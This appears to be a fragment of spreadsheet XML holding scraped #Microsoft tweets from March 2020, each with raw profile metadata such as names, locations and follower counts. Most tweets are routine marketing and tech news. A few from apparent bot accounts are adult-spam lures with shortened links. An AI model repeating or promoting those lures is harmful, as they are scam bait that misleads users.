    <t>{'id': 50385322, 'id_str': '50385322', 'name': 'Anibal Alcantara Jr', 'screen_name': 'AnibalAlcantara', 'location': 'Newark, NJ', 'description': 'Solutions Provider, Entrepreneur, Local TV Producer, Political Consultant, Corporate Restructuring, Music Producer, Songwriter.', 'url': 'https://t.co/ZUxjRUNHjx', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZUxjRUNHjx', 'expanded_url': 'http://www.anibalalcantarajr.com', 'display_url': 'anibalalcantarajr.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 707, 'friends_count': 1097, 'listed_count': 29, 'created_at': 'Wed Jun 24 18:15:05 +0000 2009', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10302,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'http://pbs.twimg.com/profile_images/1145041289211236352/w8l_UHVc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145041289211236352/w8l_UHVc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50385322/1471733647', 'profile_link_color': 'CC3366', 'profile_sidebar_border_color': 'DBE9ED', 'profile_sidebar_fill_color': 'E6F6F9', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 15:14:15 +0000 2020</t>
  </si>
  <si>
    <t>That's crazy: if you do a search for #IoT on the #Microsoft careers site, you will find 350+ #jobs in many disciplines all over the world. We are hiring! Come join great teams working on great tech. https://t.co/W7mjpvPG7h</t>
  </si>
  <si>
    <t>{'id': 17298405, 'id_str': '17298405', 'name': 'Olivier Bloch', 'screen_name': 'obloch', 'location': 'Washington, Issaquah', 'description': '#Community PM @Microsoft in the @Azure #IoT team. Developer advocate, #IoTShow host on @ch9, speaker, #DemoMonkey #MSIoT', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2287, 'friends_count': 1237, 'listed_count': 103, 'created_at': 'Mon Nov 10 23:56:01 +0000 2008', 'favourites_count': 2502, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2718,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'http://pbs.twimg.com/profile_images/968607197503504385/N3QWUMGU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/968607197503504385/N3QWUMGU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17298405/1519769781', 'profile_link_color': '595555', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'D6CECE', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 15:14:01 +0000 2020</t>
  </si>
  <si>
    <t>Cortana on Windows 10 is getting some changes, Microsoft announced today, as the company shifts focus for what it wants its personal:  #microsoft #cortana https://t.co/FV1b1DuGCk di @AIGhostWriter https://t.co/0OIrSI5tyu</t>
  </si>
  <si>
    <t>{'id': 59403115, 'id_str': '59403115', 'name': 'Mauro Bennici', 'screen_name': 'maurobennici', 'location': 'Turin, Piedmont', 'description': 'Co-Founder and CTO at @YouAreMyGuide and @AiGhostWriter , the AI marketing platform. Passionate about #AI #NLP #NLG #NLU', 'url': 'https://t.co/h0toNPf699', 'entities': {'url': {'urls': [{'url': 'https://t.co/h0toNPf699', 'expanded_url': 'https://ghostwriter.ai', 'display_url': 'ghostwriter.ai', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 170, 'friends_count': 160, 'listed_count': 60, 'created_at': 'Thu Jul 23 08:43:19 +0000 2009', 'favourites_count': 1098, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3431,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'http://pbs.twimg.com/profile_images/854249734097301504/e7OqoMno_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/854249734097301504/e7OqoMno_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/59403115/1546800442',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</si>
  <si>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15:13:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, EY and ConsenSys Present New Way for Big Biz to Use Public Ethereum - CoinDesk #LINK $LINK #Microsoft  https://t.co/CPwPnpbbCn</t>
  </si>
  <si>
    <t>{'id': 4827411014, 'id_str': '4827411014', 'name': 'On-Chain', 'screen_name': 'OnChainVentures', 'location': '', 'description': 'Creator of on-chain market insights, analysis, and research.  Offering guidance on smart contract creation helping to facilitate the 4th Industrial Revolution.', 'url': 'https://t.co/VVjOCkKhso', 'entities': {'url': {'urls': [{'url': 'https://t.co/VVjOCkKhso', 'expanded_url': 'http://www.onchainventures.net', 'display_url': 'onchainventures.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 558, 'friends_count': 271, 'listed_count': 26, 'created_at': 'Thu Jan 28 22:28:06 +0000 2016', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 316,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'http://pbs.twimg.com/profile_images/1110993727823249409/CHFp9NX1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110993727823249409/CHFp9NX1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4827411014/1553716240',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</si>
  <si>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15:12:51 +0000 2020</t>
  </si>
  <si>
    <t>Speedy, accurate customer service is an advantage. So is saving time by using one system to get a complete view of the customer lifecycle. Liquid Mercury Solutions delivers it all with #Microsoft #Dynamics 365, LinkedIn and #Office365 https://t.co/lz8JwQGBTf</t>
  </si>
  <si>
    <t>{'id': 145696600, 'id_str': '145696600', 'name': 'Liquid Mercury', 'screen_name': 'SharePointHg', 'location': 'Baltimore', 'description': 'A corps of elite Microsoft specialists, with strong capabilities in cloud security, Office 365, BI, #SharePoint, and Windows Azure.', 'url': 'http://t.co/6yoqNJbbQP', 'entities': {'url': {'urls': [{'url': 'http://t.co/6yoqNJbbQP', 'expanded_url': 'http://www.liquidmercurysolutions.com', 'display_url': 'liquidmercurysolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 491, 'listed_count': 5, 'created_at': 'Wed May 19 16:56:49 +0000 2010', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1009,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'http://pbs.twimg.com/profile_images/865760000731426816/EcQ2ZIPg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/865760000731426816/EcQ2ZIPg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145696600/1495248558',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</si>
  <si>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15:12:41 +0000 2020</t>
  </si>
  <si>
    <t>Time to make the long drive home. It's nice to have this little girl with me while I do what I gotta do.
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography... https://t.co/AMrwnZmVL3</t>
  </si>
  <si>
    <t>Wed Mar 04 15:12:40 +0000 2020</t>
  </si>
  <si>
    <t>MAJOR ANNOUNCEMENT!
#chainlink $link #microsoft #EY #splunk $eth $ubt
https://t.co/hOJffSbTIk https://t.co/Ex9zgJo9OU</t>
  </si>
  <si>
    <t>{'id': 1060765363825074176, 'id_str': '1060765363825074176', 'name': 'Lt. Câ¬¢l. Linkarski', 'screen_name': 'LtColLinkarski', 'location': 'Blockchain Battlefield', 'description': 'Providing $LINK Marines the best intel from the blockchain battlefield. OORAH!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2439, 'friends_count': 1333, 'listed_count': 17, 'created_at': 'Fri Nov 09 05:25:45 +0000 2018', 'favourites_count': 26656, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10085, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220446751326236672/vWLx-3M2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220446751326236672/vWLx-3M2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1060765363825074176/1564811691',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</si>
  <si>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15:12:17 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/QMCsbvrLQN</t>
  </si>
  <si>
    <t>Wed Mar 04 15:12:11 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, VistaBizHub Inc delivers the data, security and AI you need to build an agile data estate. https://t.co/cgpWnSlPG0</t>
  </si>
  <si>
    <t>{'id': 981959150669266946, 'id_str': '981959150669266946', 'name': 'Hicham Zac Ennaimi', 'screen_name': 'hicham_zac', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 21, 'friends_count': 50, 'listed_count': 2, 'created_at': 'Thu Apr 05 18:18:00 +0000 2018', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1360, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/981959964435537920/R6Hv8Nue_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981959964435537920/R6Hv8Nue_normal.jpg',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</si>
  <si>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15:12:04 +0000 2020</t>
  </si>
  <si>
    <t>#Business #Ethereum #Microsoft #ConsenSys #EnterpriseBlockchain Microsoft, EY and ConsenSys Tout New Way for Big Biz to Use Public Ethereum https://t.co/plDZxrs30B https://t.co/qSVOIQ1hpi</t>
  </si>
  <si>
    <t>Microsoft, EY and ConsenSys Tout New Way for Big Biz to Use Public Ethereum: A trio of heavy-hitters has come up with a new way of using the ethereum mainnet to connect firms internal systems for resource planning. https://t.co/dY6inMb1gG #Business #Ethereum #Microsoft https://t.co/x2tZfkjtCM</t>
  </si>
  <si>
    <t>{'id': 721424072, 'id_str': '721424072', 'name': 'Jason Fernandes', 'screen_name': 'TokenJay', 'location': '', 'description': 'COO/Co-Founder @AETokenio Founder,@FUNLCorp, @SmartKlock https://t.co/OlEDVly8vk | Crypto Analyst | Blockchain Speaker | jason@jasonfernandes.com', 'url': 'https://t.co/vWtk1P04N2', 'entities': {'url': {'urls': [{'url': 'https://t.co/vWtk1P04N2', 'expanded_url': 'http://www.JasonFernandes.com', 'display_url': 'JasonFernandes.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/OlEDVly8vk', 'expanded_url': 'http://LDKids.org', 'display_url': 'LDKids.org', 'indices': [57, 80]}]}}, 'protected': False, 'followers_count': 911, 'friends_count': 1125, 'listed_count': 12, 'created_at': 'Sat Jul 28 03:44:52 +0000 2012', 'favourites_count': 2004, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42654,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'http://pbs.twimg.com/profile_images/1173773058248568833/Y0OHsauA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173773058248568833/Y0OHsauA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/721424072/1561837697',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</si>
  <si>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15:12:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces Arctic Camo Special Edition #Xbox controller https://t.co/I880EnKx7s</t>
  </si>
  <si>
    <t>I like to dance naked  Want to see?
https://t.co/f4m6wUpaLQ
#Thornton
 #beautiful #microsoft https://t.co/R6PDlRZk8e</t>
  </si>
  <si>
    <t>{'id': 1234961514202791938, 'id_str': '1234961514202791938', 'name': 'Erica Lopez', 'screen_name': 'jenmokelo', 'location': 'Albuquerque, USA', 'description': 'When I saw you I fell in love, and you smiled because you knew.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Tue Mar 03 21:59:09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'http://pbs.twimg.com/profile_images/1234966617261514753/-_ajq_cC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234966617261514753/-_ajq_cC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234961514202791938/1583273995',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</si>
  <si>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15:11:55 +0000 2020</t>
  </si>
  <si>
    <t>Do you know there is another way you could configure your Teams settings on Laptop/Desktop via taskbar at the bottom right?
- Change your status
- Sign in/Sign out
- View settings
- Quit/Open Teams App
- Get logs (Useful for IT support 4 troubleshoot)
#teams #microsoft #tips https://t.co/2w3U7JHOUl</t>
  </si>
  <si>
    <t>Xi Jinping is calling the People of China back to work then....CUT.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China 
https://t.co/HnSpZNudvq</t>
  </si>
  <si>
    <t>Wed Mar 04 15:11:52 +0000 2020</t>
  </si>
  <si>
    <t>Working remotely during challenging times - #Microsoft 365 Blog https://t.co/sGj4vPaOlG</t>
  </si>
  <si>
    <t>{'id': 115198800, 'id_str': '115198800', 'name': 'Pedro Moreno', 'screen_name': 'pedromorenoh', 'location': 'Pozuelo de AlarcÃ³n, Madrid', 'description': 'Office 365 Partner Technical Consultant at @MicrosoftES , Spinning, Photography, Trekking...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 191, 'friends_count': 345, 'listed_count': 11, 'created_at': 'Wed Feb 17 22:57:03 +0000 2010', 'favourites_count': 306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 617,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'http://pbs.twimg.com/profile_images/625994417606782976/e0w0aj68_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/625994417606782976/e0w0aj68_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/115198800/1433944374', 'profile_link_color': '1F98C6',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</si>
  <si>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15:10:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge now allows you to enable PiP mode from Global Media Controls https://t.co/k5eM3fermm</t>
  </si>
  <si>
    <t>Wed Mar 04 15:10:04 +0000 2020</t>
  </si>
  <si>
    <t>Why "Microsoft Loves Linux"? #Linux #Microsoft #OpenSource #Business https://t.co/4ltCkymUEQ #3D</t>
  </si>
  <si>
    <t>Wed Mar 04 15:09:28 +0000 2020</t>
  </si>
  <si>
    <t>It's crazy to think people are still using #Windows7 after #Microsoft recently stopped supporting it, now the OS is left vulnerable and exploitable for #hackers #CMPClass280
https://t.co/Bx6hEEPfxw</t>
  </si>
  <si>
    <t>{'id': 1221848976246349827, 'id_str': '1221848976246349827', 'name': 'Kevin M', 'screen_name': 'KevinMc294', 'location': '', 'description': 'CCM Account', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Mon Jan 27 17:34:39 +0000 2020', 'favourites_count': 3,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</si>
  <si>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Wed Mar 04 15:09:13 +0000 2020</t>
  </si>
  <si>
    <t>You would think #Microsoft would have #developed a good #browser by now after #dominating the #market in the early 90s and early 2000s in their respective fields. This is so frustrating and makes me want to #uninstall #MicrosoftEdge completely from this device #Surface #Pro 7</t>
  </si>
  <si>
    <t>Wed Mar 04 15:08:10 +0000 2020</t>
  </si>
  <si>
    <t>Find out how #Microsoft certifications give your business a competitive advantage while strengthening your IT staff, improving operations, and increasing ROI on your software purchases. Download your copy now. https://t.co/2vDpUYtYux #Ebook https://t.co/nMeGIfTJlT</t>
  </si>
  <si>
    <t>Wed Mar 04 15:06:10 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/KPsgVl2vSk</t>
  </si>
  <si>
    <t>{'id': 47675741, 'id_str': '47675741', 'name': 'UNAPEN, Inc.', 'screen_name': 'UNAPEN', 'location': 'Meriden, Connecticut', 'description': 'Software provider &amp; technology consultants enabling investment mgrs &amp; nonprofit organizations with tools &amp; techniques to grow their business, not their overhead', 'url': 'https://t.co/Z68UR6fFoa', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z68UR6fFoa', 'expanded_url': 'http://unapen.com', 'display_url': 'unapen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 282, 'listed_count': 22, 'created_at': 'Tue Jun 16 17:00:24 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 416,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'http://pbs.twimg.com/profile_images/265731898/unapenlogosquare_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/265731898/unapenlogosquare_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47675741/1409841132', 'profile_link_color': 'FF3300', 'profile_sidebar_border_color': '86A4A6', 'profile_sidebar_fill_color': 'A0C5C7', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 15:06:04 +0000 2020</t>
  </si>
  <si>
    <t>#Ethereum #Microsoft Microsoft, EY and ConsenSys Present New Way for Big Biz to Use Public Ethereum https://t.co/j2YO06cdDg  | https://t.co/vqHPEDx05k https://t.co/fdqNbRCa32</t>
  </si>
  <si>
    <t>{'id': 3875594838, 'id_str': '3875594838', 'name': 'Blockchain and Technology News Center', 'screen_name': 'eBargainsToday', 'location': '', 'description': 'Tech and blockchain news. Sign up today to automatically copy successful Forex trading signals of your choice and earn passive income while doing what you love!', 'url': 'https://t.co/GO2HSl2v24', 'entities': {'url': {'urls': [{'url': 'https://t.co/GO2HSl2v24', 'expanded_url': 'http://bit.ly/FXtrade11', 'display_url': 'bit.ly/FXtrade11', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6906, 'friends_count': 16635, 'listed_count': 333, 'created_at': 'Tue Oct 13 01:53:50 +0000 2015', 'favourites_count': 15078, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 140825,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'http://pbs.twimg.com/profile_images/1231309743135739904/WnfZ8PUM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231309743135739904/WnfZ8PUM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3875594838/1519859063',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</si>
  <si>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15:05:57 +0000 2020</t>
  </si>
  <si>
    <t>As #China's economy crashes, would the Chinese communist Party overthrow #XiJinping
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford 
https://t.co/enamj7Wszx</t>
  </si>
  <si>
    <t>Wed Mar 04 15:05:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, EY and ConsenSys Tout New Way for Big Biz to Use Public #ethereum - CoinDesk #Business #Microsoft #ConsenSys #EnterpriseBlockchain #Nightfall #BaselineProtocol https://t.co/EQSNhUKU18 https://t.co/xTc1HfA1eh</t>
  </si>
  <si>
    <t>Wed Mar 04 15:05:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, EY and ConsenSys Present New Way for Big Biz to Use Public Ethereum https://t.co/53qmAhmU4I #Business #Ethereum #Microsoft #ConsenSys #EnterpriseBlockchain</t>
  </si>
  <si>
    <t>Wed Mar 04 15:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Don't miss out on this opportunity to learn #Microsoft #Windows 10 Always On #VPN from the experts! Coming to New York, May 12-14. Register today! #Windows10 #Win10 #mobility #aovpn https://t.co/ZYZd8isu1C</t>
  </si>
  <si>
    <t>Wed Mar 04 15:04:59 +0000 2020</t>
  </si>
  <si>
    <t>I bought a new #Microsoft #Surface #Pro 7 with #8GB of #memory and #Microsoft #Edge runs like complete #trash on it, I was writing #python and apparently the #browser crashes if it looses #internet &amp;amp; trys to reconnect. Why does #Chrome by #Google perform better than this trash?</t>
  </si>
  <si>
    <t>Wed Mar 04 15:04:22 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger explains how his team at Microsoft came to be 50% women.
https://t.co/VWZFJmqpUm
@Microsoft @SoniaTagare @theCUBE #WiDS2020 #theCUBE #Microsoft #EnterpriseTech #WomeninTech #datascience https://t.co/SsNNG1Weac</t>
  </si>
  <si>
    <t>Wed Mar 04 15:03:11 +0000 2020</t>
  </si>
  <si>
    <t>Large survey finds #Microsoft well-liked, most trusted US Technology Brand https://t.co/uVytrAZXvk #lin</t>
  </si>
  <si>
    <t>Wed Mar 04 15:02:13 +0000 2020</t>
  </si>
  <si>
    <t>By 2030, global demand for water will surpass supply by 40%. That's why @Ecolab uses #Microsoft #Azure and #PowerBI to help customers produce better with much less water. https://t.co/ZETuMkiMHY</t>
  </si>
  <si>
    <t>{'id': 24830215, 'id_str': '24830215', 'name': 'Samudra Vijay', 'screen_name': 'samudravijay', 'location': 'Raleigh, NC', 'description': '', 'url': 'https://t.co/xci5PVhzi0', 'entities': {'url': {'urls': [{'url': 'https://t.co/xci5PVhzi0', 'expanded_url': 'http://samitsolutions.com', 'display_url': 'samitsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 119, 'friends_count': 510, 'listed_count': 0, 'created_at': 'Tue Mar 17 03:15:04 +0000 2009', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 116,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</si>
  <si>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Wed Mar 04 15:01:48 +0000 2020</t>
  </si>
  <si>
    <t>Winners Wednesday shout-out to all our amazing Japanese champions! The Olympics are in Japan this year, but were even more excited for our Japanese champs to show their skills at the #ACAWC and #MOSWC . #graphicdesign #microsoft #japan #CertiportCertified https://t.co/ymprE9AC14</t>
  </si>
  <si>
    <t>{'id': 20704385, 'id_str': '20704385', 'name': 'Certiport', 'screen_name': 'Certiport', 'location': '', 'description': 'Microsoft, Adobe, Autodesk, Quickbooks, and IC3 credentials that help people certify to succeed in both academics and the workforce.', 'url': 'https://t.co/nu4uI4tpLF', 'entities': {'url': {'urls': [{'url': 'https://t.co/nu4uI4tpLF', 'expanded_url': 'http://www.certiport.com', 'display_url': 'certiport.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5841, 'friends_count': 1498, 'listed_count': 124, 'created_at': 'Thu Feb 12 18:56:51 +0000 2009', 'favourites_count': 1284, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9002, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/3189492125/e03d348ce7dcd5a2ba040c856892a52c_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3189492125/e03d348ce7dcd5a2ba040c856892a52c_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20704385/1564542033', 'profile_link_color': '49A942', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FFF8EB', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 15:01:47 +0000 2020</t>
  </si>
  <si>
    <t>In just a few weeks, our #MicrosoftTeams roadshow will set up shop in Omaha, NE and Milwaukee, WI.  Don't miss your opportunity to learn about Microsoft Teams and Microsofts Enterprise #Mobility and #Security. Register today - https://t.co/CZswJqZVYa #Microsoft #FutureWorkplace https://t.co/0hGxelVfwX</t>
  </si>
  <si>
    <t>{'id': 1347031344, 'id_str': '1347031344', 'name': 'SoftwareONE USA', 'screen_name': 'SOFTWAREONE_USA', 'location': 'Waukesha, WI, USA', 'description': 'Leading global platform, solutions, and services provider - Empowering Companies to Transform.', 'url': 'https://t.co/nPhJ9U1CDo', 'entities': {'url': {'urls': [{'url': 'https://t.co/nPhJ9U1CDo', 'expanded_url': 'https://www.softwareone.com/en-us/', 'display_url': 'softwareone.com/en-us/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 611, 'friends_count': 625, 'listed_count': 46, 'created_at': 'Fri Apr 12 15:14:06 +0000 2013', 'favourites_count': 216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1276,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'http://pbs.twimg.com/profile_images/1199737855934787585/LTBOhaXV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199737855934787585/LTBOhaXV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1347031344/1562174043', 'profile_link_color': 'E3000B',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</si>
  <si>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15:01:11 +0000 2020</t>
  </si>
  <si>
    <t>Time to make the long drive home. It's nice to have this little girl with me while I get things done.
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #marijuana... https://t.co/pacdcBBFzX</t>
  </si>
  <si>
    <t>Wed Mar 04 15:01:06 +0000 2020</t>
  </si>
  <si>
    <t>Anitha, one of Code Authority's senior software developers, passed her AZ-203 Microsoft Azure Certified Developer Associate exam. Congratulations on receiving your certification! 
#Microsoft #Azure #Development #microsoftazure https://t.co/HBJqvbC0WP</t>
  </si>
  <si>
    <t>{'id': 25522882, 'id_str': '25522882', 'name': 'Code Authority', 'screen_name': 'CodeAuthority', 'location': '3001 Dallas Pkwy #500, Frisco, TX 75034, USA', 'description': 'Code Authority, an @Improving company, offers onshore #technology consulting services such as #business automation, UI/UX &amp; full-service #digitalmarketing.', 'url': 'http://t.co/IiwiXyctqB', 'entities': {'url': {'urls': [{'url': 'http://t.co/IiwiXyctqB', 'expanded_url': 'http://www.codeauthority.com', 'display_url': 'codeauthority.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 707, 'friends_count': 614, 'listed_count': 21, 'created_at': 'Fri Mar 20 15:41:04 +0000 2009', 'favourites_count': 1102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1329,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'http://pbs.twimg.com/profile_images/1111278411954221057/AsRTjZbp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111278411954221057/AsRTjZbp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25522882/1566490929',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</si>
  <si>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Mar 04 15:00:37 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations! You won a free erotic service. I will give it to you when you meet on the website 
 #africa #microsoft https://t.co/X6edowzPW0</t>
  </si>
  <si>
    <t>{'id': 1235207768996536322, 'id_str': '1235207768996536322', 'name': 'Misty Shepherd', 'screen_name': 'tionafaher', 'location': 'Albuquerque, USA', 'description': 'I saw that you were perfect, and so I loved you. Then I saw that you were not perfect and I loved you even more', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Wed Mar 04 14:17:41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'http://pbs.twimg.com/profile_images/1235208235671605248/bLRhUalJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235208235671605248/bLRhUalJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235207768996536322/1583331625',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</si>
  <si>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15:00:31 +0000 2020</t>
  </si>
  <si>
    <t>In just a few weeks, our #MicrosoftTeams roadshow will set up shop in Omaha, NE and Milwaukee, WI.  Don't miss your opportunity to learn about Microsoft Teams and Microsofts Enterprise #Mobility and #Security. Register today - https://t.co/qCeVbE5Mww #Microsoft #FutureWorkplace https://t.co/F3lUIHGRG2</t>
  </si>
  <si>
    <t>{'id': 1007420172, 'id_str': '1007420172', 'name': 'SoftwareONE Canada', 'screen_name': 'SoftwareONE_CA', 'location': 'Toronto, Canada', 'description': 'We help customers achieve tangible results and drive their businesses forward.\nWe empower companies to transform.', 'url': 'https://t.co/iJwMuBIh7P', 'entities': {'url': {'urls': [{'url': 'https://t.co/iJwMuBIh7P', 'expanded_url': 'https://www.softwareone.com/en/', 'display_url': 'softwareone.com/en/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 249, 'friends_count': 374, 'listed_count': 7, 'created_at': 'Wed Dec 12 22:15:34 +0000 2012', 'favourites_count': 235, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 322,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'http://pbs.twimg.com/profile_images/1122949793666355200/wPsOHlH1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1122949793666355200/wPsOHlH1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1007420172/1556567583', 'profile_link_color': 'DB042F',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</si>
  <si>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15:00:19 +0000 2020</t>
  </si>
  <si>
